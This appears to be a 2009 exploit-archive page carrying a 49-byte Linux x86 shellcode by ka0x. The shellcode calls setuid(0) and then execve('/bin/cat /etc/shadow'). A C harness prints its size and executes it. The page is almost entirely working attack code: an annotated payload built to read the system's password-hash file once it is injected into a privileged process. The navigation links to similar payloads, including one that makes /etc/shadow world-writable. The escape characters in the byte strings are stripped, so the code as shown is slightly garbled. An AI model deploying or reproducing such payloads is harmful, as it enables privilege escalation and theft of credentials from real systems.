[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux - setuid(0) and cat /etc/shadow
# Published : 2009-12-04
# Author : ka0x
# Previous Title : win xp sp2 PEB ISbeingdebugged shellcode
# Next Title : Linux - chmod(/etc/shadow, 0666) & exit() - 33 bytes
#include <stdio.h>
/*
linux/x86 ; setuid(0) & execve(/bin/cat /etc/shadow) 49 bytes
written by ka0x - <ka0x01[alt+64]gmail.com>
lun sep 21 16:40:16 CEST 2009
greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek and others!
*/
int main()
{
char shellcode[] =
"x31xdb" // xor ebx,ebx
"x6ax17" // push byte 17h
"x58" // pop eax
"xcdx80" // int 0x80
"x8dx43x0b" // lea eax,[ebx+0xb]
"x99" // cdq
"x52" // push edx
"x68x2fx63x61x74" // push dword 0x7461632f
"x68x2fx62x69x6e" // push dword 0x6e69622f
"x89xe3" // mov ebx,esp
"x52" // push edx
"x68x61x64x6fx77" // push dword 0x776f6461
"x68x2fx2fx73x68" // push dword 0x68732f2f
"x68x2fx65x74x63" // push dword 0x6374652f
"x89xe1" // mov ecx,esp
"x52" // push edx
"x51" // push ecx
"x53" // push ebx
"x89xe1" // mov ecx,esp
"xcdx80" ; // int 80h
printf("[*] ShellCode size (bytes): %dnn", sizeof(shellcode)-1 );
(*(void(*)()) shellcode)();
return 0;
}